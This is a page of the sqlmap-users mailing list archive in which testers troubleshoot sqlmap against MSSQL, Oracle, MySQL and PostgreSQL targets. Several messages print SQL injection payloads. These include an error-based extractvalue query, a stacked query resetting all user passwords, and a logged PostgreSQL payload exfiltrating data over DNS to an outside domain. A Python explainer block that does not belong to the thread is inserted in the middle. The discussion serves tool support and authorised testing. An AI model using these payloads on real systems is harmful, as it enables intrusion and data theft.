sqlmap-users Mailing List for sqlmap (Page 17)
From: Miroslav S. <mir...@gm...> - 2014-12-05 10:56:29

Will check this out in an hour or so. At first glance I can see that we have to make a patch for MsSQL.

Bye

On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
> Looking at the commands sent I can see three drop tables for sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored procedures.
>
> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
> > Just spotted --cleanup but that didn't remove the procedure, sqlmap command seemed to run OK though but didn't say anything about what it was removing, should it have done?
> >
> > Robin
> >
> > On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
> >> I'm testing sqlmap against an MSSQL DB and looking at running OS commands. In an attempt to re-enable xp_cmdshell a stored proc called xp_gedp has been created and left behind, is there any way to automatically clean up this and any other things that are created?
> >>
> >> Robin
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server from Actuate! Instantly Supercharge Your Business Reports and Dashboards with Interactivity, Sharing, Native Excel Exports, App Integration & more. Get technology previously reserved for billion-dollar corporations, FREE
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
From: Robin W. <ro...@di...> - 2014-12-04 15:33:32

Just spotted --cleanup but that didn't remove the procedure, sqlmap command seemed to run OK though but didn't say anything about what it was removing, should it have done?

Robin

On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
> I'm testing sqlmap against an MSSQL DB and looking at running OS commands. In an attempt to re-enable xp_cmdshell a stored proc called xp_gedp has been created and left behind, is there any way to automatically clean up this and any other things that are created?
>
> Robin
From: Robin W. <ro...@di...> - 2014-12-04 15:30:45

I'm testing sqlmap against an MSSQL DB and looking at running OS commands. In an attempt to re-enable xp_cmdshell a stored proc called xp_gedp has been created and left behind, is there any way to automatically clean up this and any other things that are created?

Robin
From: Robin W. <ro...@di...> - 2014-12-04 15:30:21

This is from page 57 of the readme.pdf:

"On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality explained above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), then it creates these two functions on the database and calls one of them to execute the specified command, depending on user's choice to display the standard output or not."

Shouldn't this just be for PostgreSQL? As it continues to say, MSSQL uses xp_cmdshell.

Robin
From: Robin W. <ro...@di...> - 2014-12-04 15:19:40

Looking at the commands sent I can see three drop tables for sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored procedures.

On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
> Just spotted --cleanup but that didn't remove the procedure, sqlmap command seemed to run OK though but didn't say anything about what it was removing, should it have done?
>
> Robin
>
> On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
>> I'm testing sqlmap against an MSSQL DB and looking at running OS commands. In an attempt to re-enable xp_cmdshell a stored proc called xp_gedp has been created and left behind, is there any way to automatically clean up this and any other things that are created?
>>
>> Robin
From: Miroslav S. <mir...@gm...> - 2014-12-03 13:45:39

And what's the original sqlmap command you used?

Bye

On Wed, Dec 3, 2014 at 1:39 PM, Harry Acker <har...@gm...> wrote:
> I'm testing an app which I've confirmed is running Oracle and has injection into the order by field.
>
> http://xxx/test?order=id
>
> id is a direct mapping to the database column name. I confirmed injection with the following:
>
> http://xxx/test?order=%28select%20%27id%27%20from%20dual%29
>
> The site returns either a table of data or the Oracle exception if the field name given is invalid.
>
> I've run sqlmap against it with level 5 and risk 3 (it's a test site, client happy to reset if damaged) but it doesn't detect the injection. I've also tried with --string passing it a value from the table so it knows when it hits valid data.
>
> I know this should work and from what I've seen when searching a level 3 scan should detect it. What am I doing wrong?
>
> And just for my curiosity, as I've got the working injection, would I be able to pass that to sqlmap and point it at that to say inject into here. I gave it a quick try and it complained that the url provided was already tainted and I should clean it up first.
>
> Harry.

--
Miroslav Stampar
http://about.me/stamparm
From: Harry A. <har...@gm...> - 2014-12-03 12:40:05

I'm testing an app which I've confirmed is running Oracle and has injection into the order by field.

http://xxx/test?order=id

id is a direct mapping to the database column name. I confirmed injection with the following:

http://xxx/test?order=%28select%20%27id%27%20from%20dual%29

The site returns either a table of data or the Oracle exception if the field name given is invalid.

I've run sqlmap against it with level 5 and risk 3 (it's a test site, client happy to reset if damaged) but it doesn't detect the injection. I've also tried with --string passing it a value from the table so it knows when it hits valid data.

I know this should work and from what I've seen when searching a level 3 scan should detect it. What am I doing wrong?

And just for my curiosity, as I've got the working injection, would I be able to pass that to sqlmap and point it at that to say inject into here. I gave it a quick try and it complained that the url provided was already tainted and I should clean it up first.

Harry.
From: Miroslav S. <mir...@gm...> - 2014-11-21 10:40:42

Hi.

Update to the latest revision and try to use the option --method (e.g. --method=PUT)

Bye

On Fri, Nov 21, 2014 at 2:57 AM, Miroslav Stampar <mir...@gm...> wrote:
> Will do this in a day or two.
>
> Bye
> On Nov 19, 2014 3:46 AM, "Travis Altman" <tra...@gm...> wrote:
>> Is there any way to supply another http method besides get or post? I have an app that is using the put method. Thanks.

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-11-21 01:57:13

Will do this in a day or two.

Bye

On Nov 19, 2014 3:46 AM, "Travis Altman" <tra...@gm...> wrote:
> Is there any way to supply another http method besides get or post? I have an app that is using the put method. Thanks.
From: Sabin R. <thi...@gm...> - 2014-11-19 05:57:47

oo, good luck. :) thanks.

On Wed, Nov 19, 2014 at 11:32 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Currently there is none, but we do have it on our TODO list.
>
> Bye
> On Nov 19, 2014 6:45 AM, "Sabin Ranjit" <thi...@gm...> wrote:
>> hi,
>> is there any report generation method in sqlmap? So far now I run sqlmap from terminal and leave it, and I look for the issues in the terminal. I'm looking for a better method like reporting so that I can leave sqlmap in the server and check the report another day.
>> thanks.
From: Miroslav S. <mir...@gm...> - 2014-11-19 05:47:36

Hi.

Currently there is none, but we do have it on our TODO list.

Bye

On Nov 19, 2014 6:45 AM, "Sabin Ranjit" <thi...@gm...> wrote:
> hi,
> is there any report generation method in sqlmap? So far now I run sqlmap from terminal and leave it, and I look for the issues in the terminal. I'm looking for a better method like reporting so that I can leave sqlmap in the server and check the report another day.
> thanks.
From: Sabin R. <thi...@gm...> - 2014-11-19 05:45:30

hi,
is there any report generation method in sqlmap? So far now I run sqlmap from terminal and leave it, and I look for the issues in the terminal. I'm looking for a better method like reporting so that I can leave sqlmap in the server and check the report another day.
thanks.
From: Brandon P. <bpe...@gm...> - 2014-11-19 04:38:43

I have actually worked around this with some burp suite trickery (rewriting http verb) and using --proxy with sqlmap... Not ideal.

Sent from a computer

> On Nov 18, 2014, at 8:45 PM, Travis Altman <tra...@gm...> wrote:
>
> Is there any way to supply another http method besides get or post? I have an app that is using the put method. Thanks.
From: Travis A. <tra...@gm...> - 2014-11-19 02:46:01

Is there any way to supply another http method besides get or post? I have an app that is using the put method. Thanks.
From: Kaiyi Z. <zky...@gm...> - 2014-11-10 06:46:17

I cannot receive from the list, so this is only a test email. Sorry, all.
From: Konrads S. <ko...@sm...> - 2014-11-03 20:20:54

Just as a note - I had to do data.encode("base64").strip() to remove the newline which the encode adds.

--
Konrads Smelkovs
Applied IT sorcery.

On 3 November 2014 07:29, Konrads Smelkovs <ko...@sm...> wrote:
> Cheers, works!
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 2 November 2014 17:10, Miroslav Stampar <mir...@gm...> wrote:
>> Then please try --eval instead of --tamper.
>>
>> E.g. --eval="param=param.encode('base64')"
>>
>> Bye
>> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
>>> Miroslav,
>>>
>>> I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so:
>>>
>>> <!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1-->
>>>
>>> Which then is exploitable using some well documented methods such as appending a string like this:
>>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>>
>>> which gives us a nice error:
>>> <!--XPATH syntax error: '~root@localhost'-->
>>>
>>> Anyhow, I got halfway there with the following string:
>>> sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>>>
>>> sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector:
>>>
>>> 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>>> 2nd request URL: https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>>
>>> Also none of the test vectors seem to trigger an error response.
>>>
>>> I tried with --risk=3 to no avail.
>>>
>>> version: 1.0-dev-1ef2c40
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote:
>>>> Hi.
>>>>
>>>> In your case I would do this:
>>>>
>>>> 1) Decode original base64 value and give it to the sqlmap in decoded form (e.g. id=123 instead of original id=313233)
>>>> 2) Use --tamper=base64encode
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote:
>>>>> Hello,
>>>>>
>>>>> I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values?
>>>>>
>>>>> (specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back)
>>>>>
>>>>> --
>>>>> Konrads Smelkovs
>>>>> Applied IT sorcery.
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
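The newline problem Konrads notes above, shown in an added Python 3 example that is not code from the thread or from sqlmap: base64.encodebytes behaves like the old str.encode('base64') codec and appends a newline, which survives URL-encoding as %0A and changes the value the server receives; base64.b64encode does not. The sample URL is the one from the thread, reconstructed here, and the function names are my own.

```python
import base64
import binascii
from urllib.parse import parse_qsl, unquote, urlencode, urlsplit, urlunsplit

# Constructed sample: the thread's URL with the base64 parameter already in
# decoded form, as Miroslav suggested feeding it to sqlmap.
SAMPLE_URL = "https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337"


def legacy_style_b64(raw: bytes) -> str:
    """Mimics Python 2's str.encode('base64'): the output ends with a newline.
    base64.encodebytes is the Python 3 equivalent of that codec."""
    return base64.encodebytes(raw).decode("ascii")


def clean_b64(raw: bytes) -> str:
    """Strict base64 with no trailing newline (what the thread's .strip() achieves)."""
    return base64.b64encode(raw).decode("ascii")


def rewrite_param(url: str, name: str, encoder) -> str:
    """Return url with the named query parameter replaced by encoder(value).
    parse_qsl splits each pair on the first '=' only, so the '=' characters
    inside the DATA:... value stay part of the value."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    rewritten = [(k, encoder(v.encode()) if k == name else v) for k, v in query]
    return urlunsplit(parts._replace(query=urlencode(rewritten)))


def encoded_param_on_wire(url: str, name: str, encoder) -> str:
    """Raw (percent-encoded) value of the parameter as it appears in the request line."""
    for pair in urlsplit(rewrite_param(url, name, encoder)).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    raise KeyError(name)


def is_clean(wire_value: str) -> bool:
    """True when the received value decodes under strict validation, i.e. it
    carries no stray newline (%0A) or other non-alphabet byte."""
    try:
        base64.b64decode(unquote(wire_value), validate=True)
        return True
    except binascii.Error:
        return False


if __name__ == "__main__":
    for label, enc in (("legacy codec", legacy_style_b64), ("b64encode", clean_b64)):
        wire = encoded_param_on_wire(SAMPLE_URL, "data", enc)
        print(f"{label:12s} data={wire}  clean={is_clean(wire)}")
```

With the legacy codec the parameter on the wire ends in %0A and fails strict decoding, which is why the baseline request did not match; the b64encode form matches the prefix of the encoded value in the thread exactly.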
From: Konrads S. <ko...@sm...> - 2014-11-03 07:29:32

Cheers, works!

--
Konrads Smelkovs
Applied IT sorcery.

On 2 November 2014 17:10, Miroslav Stampar <mir...@gm...> wrote:
> Then please try --eval instead of --tamper.
>
> E.g. --eval="param=param.encode('base64')"
>
> Bye
> On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
>> Miroslav,
>>
>> I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so:
>>
>> <!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1-->
>>
>> Which then is exploitable using some well documented methods such as appending a string like this:
>> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>>
>> which gives us a nice error:
>> <!--XPATH syntax error: '~root@localhost'-->
>>
>> Anyhow, I got halfway there with the following string:
>> sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>>
>> sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector:
>>
>> 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
>> 2nd request URL: https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>>
>> Also none of the test vectors seem to trigger an error response.
>>
>> I tried with --risk=3 to no avail.
>>
>> version: 1.0-dev-1ef2c40
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote:
>>> Hi.
>>>
>>> In your case I would do this:
>>>
>>> 1) Decode original base64 value and give it to the sqlmap in decoded form (e.g. id=123 instead of original id=313233)
>>> 2) Use --tamper=base64encode
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote:
>>>> Hello,
>>>>
>>>> I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values?
>>>>
>>>> (specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back)
>>>>
>>>> --
>>>> Konrads Smelkovs
>>>> Applied IT sorcery.
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-11-02 17:10:35

Then please try --eval instead of --tamper.

E.g. --eval="param=param.encode('base64')"

Bye

On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <ko...@sm...> wrote:
> Miroslav,
>
> I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so:
>
> <!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1-->
>
> Which then is exploitable using some well documented methods such as appending a string like this:
> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>
> which gives us a nice error:
> <!--XPATH syntax error: '~root@localhost'-->
>
> Anyhow, I got halfway there with the following string:
> sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>
> sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector:
>
> 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
> 2nd request URL: https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>
> Also none of the test vectors seem to trigger an error response.
>
> I tried with --risk=3 to no avail.
>
> version: 1.0-dev-1ef2c40
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote:
>> Hi.
>>
>> In your case I would do this:
>>
>> 1) Decode original base64 value and give it to the sqlmap in decoded form (e.g. id=123 instead of original id=313233)
>> 2) Use --tamper=base64encode
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote:
>>> Hello,
>>>
>>> I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values?
>>>
>>> (specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back)
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
From: Konrads S. <ko...@sm...> - 2014-11-02 16:42:37

Miroslav,

I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so:

<!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1-->

Which then is exploitable using some well documented methods such as appending a string like this:
' or extractvalue(1,concat(0x7e,(SELECT user()))) or'

which gives us a nice error:
<!--XPATH syntax error: '~root@localhost'-->

Anyhow, I got halfway there with the following string:
sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080

sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector:

1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
2nd request URL: https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D

Also none of the test vectors seem to trigger an error response.

I tried with --risk=3 to no avail.

version: 1.0-dev-1ef2c40

--
Konrads Smelkovs
Applied IT sorcery.

On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> In your case I would do this:
>
> 1) Decode original base64 value and give it to the sqlmap in decoded form (e.g. id=123 instead of original id=313233)
> 2) Use --tamper=base64encode
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote:
>> Hello,
>>
>> I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values?
>>
>> (specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back)
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2014-10-31 19:29:54

Hi.

It should be fixed now with the latest commit [1]. Please update to the latest revision.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/4e0e64d06bbd7c66506c2d2bfeb854c8a546fb4f

On Fri, Oct 31, 2014 at 6:35 PM, Chris Clements <ccl...@ou...> wrote:
> Working on an injection on a target and got this error when I attempt to use DNS exfiltration:
>
> [12:17:32] [CRITICAL] invalid URL address used ("https://www.testsite.net:443/SLWebSiteTemplate_V2/login.aspx?sCorpCode=LWNaZ8T2TtGjK3K2nRx99w==-2655');%20DROP%20TABLE%20IF%20EXISTS%20PCSI;%20CREATE%20TABLE%20PCSI(fyYd%20text);%20CREATE%20OR%20REPLACE%20FUNCTION%20mNrn()\nRETURNS%20VOID%20AS%20$$\nDECLARE%20gAXt%20TEXT;%20DECLARE%20wNki%20TEXT;%20BEGIN\nSELECT%20INTO%20wNki%20(SELECT%20ENCODE(CONVERT_TO((SUBSTRING((COALESCE(CAST(3084%20AS%20CHARACTER(10000)),'%20'))::text%20FROM%201%20FOR%2031)),'UTF8'),'HEX'));%20gAXt%20:=%20E'COPY%20PCSI(fyYd)%20FROM%20E\\'\\\\\\\\\\\\\\\\HTr.'||wNki||E'.ZgJ.mydomain.com\\\\\\\\VwAi\\'';%20EXECUTE%20gAXt;%20END;%20$$%20LANGUAGE%20plpgsql%20SECURITY%20DEFINER;%20SELECT%20mNrn();--&sLocationCode=zI76x8tC/ksUgQBEEYYJfQ==")
>
> [*] shutting down at 12:17:32
>
> Did some searching, but didn't come up with anything on this error. Can someone point me in the right direction?

--
Miroslav Stampar
http://about.me/stamparm
From: Chris C. <ccl...@ou...> - 2014-10-31 17:35:30

Working on an injection on a target and got this error when I attempt to use DNS exfiltration:

[12:17:32] [CRITICAL] invalid URL address used ("https://www.testsite.net:443/SLWebSiteTemplate_V2/login.aspx?sCorpCode=LWNaZ8T2TtGjK3K2nRx99w==-2655');%20DROP%20TABLE%20IF%20EXISTS%20PCSI;%20CREATE%20TABLE%20PCSI(fyYd%20text);%20CREATE%20OR%20REPLACE%20FUNCTION%20mNrn()\nRETURNS%20VOID%20AS%20$$\nDECLARE%20gAXt%20TEXT;%20DECLARE%20wNki%20TEXT;%20BEGIN\nSELECT%20INTO%20wNki%20(SELECT%20ENCODE(CONVERT_TO((SUBSTRING((COALESCE(CAST(3084%20AS%20CHARACTER(10000)),'%20'))::text%20FROM%201%20FOR%2031)),'UTF8'),'HEX'));%20gAXt%20:=%20E'COPY%20PCSI(fyYd)%20FROM%20E\\'\\\\\\\\\\\\\\\\HTr.'||wNki||E'.ZgJ.mydomain.com\\\\\\\\VwAi\\'';%20EXECUTE%20gAXt;%20END;%20$$%20LANGUAGE%20plpgsql%20SECURITY%20DEFINER;%20SELECT%20mNrn();--&sLocationCode=zI76x8tC/ksUgQBEEYYJfQ==")

[*] shutting down at 12:17:32

Did some searching, but didn't come up with anything on this error. Can someone point me in the right direction?
From: Miroslav S. <mir...@gm...> - 2014-10-30 13:12:24

Hi.

In your case I would do this:

1) Decode original base64 value and give it to the sqlmap in decoded form (e.g. id=123 instead of original id=313233)
2) Use --tamper=base64encode

Kind regards,
Miroslav Stampar

On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote:
> Hello,
>
> I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values?
>
> (specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back)
>
> --
> Konrads Smelkovs
> Applied IT sorcery.

--
Miroslav Stampar
http://about.me/stamparm
From: Konrads S. <ko...@sm...> - 2014-10-30 12:31:53

Hello,

I am writing a small modification which would allow to tamper/decode variables in the request? As I understand that the parameters are decoded/parsed into a dict after option.py:2323 (parseTargetDirect()), but where can I access the full, parsed dict of the get/post/cookie values?

(specifically I have a base64 encoded string as a parameter and to insert the payload, the parameter must be base64-decoded, injected and then encoded back)

--
Konrads Smelkovs
Applied IT sorcery.
From: Kaiyi Z. <zky...@gm...> - 2014-10-27 08:34:59

Hi, everyone

I use sqlmap -u "http://x.x.x.x/testenv/mysql/get_int.php?id=1" -f -b --current-user -v 5

Actually the SQL is select * from user where id=$_Get['id'] limit 0,1

Before I exec this, I rm the sqlmap output directory and open the MySQL general_log. I view the sqlmap debug messages and mysql.log, and there are only payloads like "?id=1 xxx". I think sqlmap is fetching the current-db and current-user using error messages, but in this example there should be one payload like "?id=*-1* xxx". Can somebody explain to me why?

Thanks.
From: Brandon P. <bpe...@gm...> - 2014-10-25 15:12:54

Nope, shouldn't have anything to do with it. How do you know it is exploitable? You also haven't tried upping the level with --level=5 which is different from risk

Sent from a computer

> On Oct 25, 2014, at 1:41 AM, a dehqan <deh...@gm...> wrote:
>
> Hi
>
> Thanks;
>
> Yes of course it's exploitable.
>
> As you see I have used --risk=3 before.
>
> I think Sqlmap isn't able to handle it properly because there is custom injection in name of parameter and also name is an array.
> Any opinion?
>
> Regards dehqan
>
>> On Fri, Oct 24, 2014 at 4:00 AM, Ryan Sears <rd...@mt...> wrote:
>> // Grrr, stupid gmail. Didn't reply-all first time :-P
>>
>> Are you sure it's exploitable? Try upping the --level and --risk.
>>
>> The #1* means the first * character you put into the --data parameter. It's in lieu of saying something like "POST parameter 'derp' is not exploitable" if you pass in --data="derp=testme" and ask it to test the "derp" parameter.
>>
>> Ryan
>>
>>> On Thu, Oct 23, 2014 at 5:14 AM, a dehqan <deh...@gm...> wrote:
>>> Thanks man;
>>>
>>> I want to send an array with query in its index as value of "name" POST variable.
>>>
>>> Remember if I want to inject it manually I should try >
>>> <input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass= 'test123'; -- ]" value="" size="60" maxlength="60" class="form-text required error">
>>>
>>> So tried (sqlmap/1.0-dev):
>>>
>>> python sqlmap.py -u "http://localhost//?id=n&ssid=w" --data="name[0*]=name" --risk=3 --flush-session --dbms=mysql
>>>
>>> Sqlmap returns this error:
>>>
>>> [WARNING] (custom) POST parameter '#1*' is not injectable
>>>
>>> What does # mean here?
>>>
>>> And how to make it work under sqlmap?
>>>
>>> Regards
>>>
>>>> On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>> Hi.
>>>>
>>>> You need to put a custom injection mark * at the place where you want sqlmap to inject. For example:
>>>>
>>>> ...name[1*]
>>>>
>>>> Bye
>>>>
>>>> p.s. your example with SELECT is not a proper one as queries are usually not supported in stacking
>>>>
>>>>> On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <deh...@gm...> wrote:
>>>>> Hi Guys,
>>>>>
>>>>> Is Sqlmap able to send an array instead of string while injecting?
>>>>>
>>>>> Like situation we have html form and we want manually send post variable 'name' this way (value is obtained from array):
>>>>>
>>>>> name="name[1 ;select * from users -- ]
>>>>>
>>>>> I want do it with Sqlmap, but how?
>>>>>
>>>>> Regards dehqan
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm